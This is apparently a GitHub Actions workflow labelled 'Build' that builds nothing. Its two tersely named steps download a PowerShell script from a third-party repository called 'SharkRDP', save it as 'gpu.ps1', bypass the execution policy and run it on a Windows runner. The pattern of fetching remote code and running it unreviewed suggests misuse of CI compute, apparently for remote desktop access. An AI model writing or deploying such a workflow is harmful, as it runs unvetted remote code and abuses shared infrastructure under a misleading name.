name: Build

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: windows-latest

    steps:
      - name: Dl
        shell: powershell
        run: |
          Invoke-WebRequest "https://raw.githubusercontent.com/fqwe070/SharkRDP/main/sh" -OutFile "gpu.ps1"

      - name: Rs
        shell: powershell
        run: |
          Set-ExecutionPolicy Bypass -Scope Process -Force
          .\gpu.ps1
